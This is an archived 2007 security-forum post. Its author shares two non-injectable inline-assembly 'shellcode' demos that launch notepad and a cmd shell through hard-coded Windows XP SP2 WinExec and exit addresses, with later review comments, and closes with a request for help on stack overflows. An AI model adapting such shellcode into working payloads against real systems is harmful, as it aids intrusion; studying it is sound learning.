some functions[C/C++] [Sitemap] - HeapOverflow Computer Security Community & Forums : Heap Overflow.com




fl0 fl0w
27-12-07, 11:46
Here are some functions, like WinExec() and exit(). It's shellcode for notepad, but as you can observe it isn't injectable. Tested on Windows XP SP2, compiled with VC++.
// MSVC inline-assembly demo: builds the NUL-terminated string "notepad" on the
// stack one byte at a time, then calls two routines through hard-coded absolute
// addresses. According to the accompanying post these are WinExec() and exit()
// as they were located on the author's Windows XP SP2 machine.
//
// NOTE(review): both call targets are literal addresses. They are meaningful
// only for the exact DLL build and load address the author measured; with a
// different kernel32 version, a different service pack, or ASLR, `call eax`
// transfers control to an unrelated location and the process will most likely
// crash. Resolve the functions by name (normal import) in real code.
main()
{
_asm{


// Manual frame setup: ebp becomes the base for the [ebp-N] stores below.
push ebp
mov ebp,esp

// Saved at [ebp-4]
push ebx

// Saved at [ebp-8] and [ebp-12]
push esi
push edi


// NOTE(review): no `sub esp,N` reserves space for the string, so the eight
// byte stores below land on [ebp-8]..[ebp-1], i.e. on top of the ebx and esi
// values pushed just above. The saved registers are never popped in this
// block, so the overwrite goes unnoticed here.

// 6E 6F 74 65 70 61 64 00 = "notepad\0"
mov byte ptr [ebp-8],6Eh
mov byte ptr [ebp-7],6Fh
mov byte ptr [ebp-6],74h
mov byte ptr [ebp-5],65h
mov byte ptr [ebp-4],70h
mov byte ptr [ebp-3],61h
mov byte ptr [ebp-2],64h
mov byte ptr [ebp-1],0

// Arguments are pushed right to left: first the integer 5, then the address
// of the string. If the target really is WinExec, 5 is the uCmdShow value
// (SW_SHOW) and the pointer is lpCmdLine - TODO confirm against the target.
push 5
lea eax,[ebp-8]
push eax

// Hard-coded address of the first routine (WinExec per the post).
mov eax,0x7c86136d
call eax

// Single integer argument 1 for the second routine (exit status, if this is
// the exit function the post mentions).
push 1

// Hard-coded address of the second routine. There is no epilogue or `ret`
// after this call, so the block presumably relies on it never returning.
mov eax,0x7c81cdda
call eax
// The addresses may not be the same on your system, so calculate them yourself
// with the depends.exe tool from the Microsoft SDK:
// add the kernel base address and the function's entry point address.
}

}

Here's one for a CMD shell.

//author fl0 fl0w
// MSVC inline-assembly demo: reserves a 44h-byte stack area, fills it with
// 0CCCCCCCCh, writes the NUL-terminated string "cmd" into its top four bytes,
// then calls two routines through hard-coded absolute addresses (WinExec() and
// exit() according to the accompanying post, measured on Windows XP SP2).
//
// NOTE(review): the call targets are literal addresses that hold only for the
// exact DLL build and load address the author measured; on any other system
// version, or with ASLR, `call eax` jumps to an unrelated location. The
// function is declared `void main()`, which is accepted by VC++ but is not
// standard C/C++.
void main(){
_asm{
// Manual frame setup, then reserve 44h bytes of locals below ebp.
push ebp
mov ebp,esp
sub esp,44h
// Saved below the reserved area, so the stores further down do not touch them.
push ebx
push esi
push edi
// Fill the whole reserved area: 11h dwords * 4 = 44h bytes of 0CCh, starting
// at its lowest address. This resembles the local-variable poisoning that
// MSVC debug builds emit - presumably copied from compiler output.
lea edi,[ebp-44h]
mov ecx,11h
mov eax,0CCCCCCCCh
rep stos dword ptr [edi]

// 63 6D 64 00 = "cmd\0", placed in the top four bytes of the reserved area.
mov byte ptr [ebp-4],63h

mov byte ptr [ebp-3],6Dh

mov byte ptr [ebp-2],64h

mov byte ptr [ebp-1],0

// Arguments are pushed right to left: the integer 5, then the string address.
// If the target really is WinExec, 5 is uCmdShow (SW_SHOW) - TODO confirm.
push 5
lea eax,[ebp-4]
push eax

// Hard-coded address of the first routine (WinExec per the post).
mov eax,0x7c86136d
call eax

// Single integer argument 1 for the second routine.
push 1

// Hard-coded address of the second routine. No epilogue or `ret` follows, so
// the block presumably relies on this call never returning.
mov eax,0x7c81cdda
call eax

}}

Btw, who is most experienced in stack overflows? I'm having some problems and hope I can get someone to help me.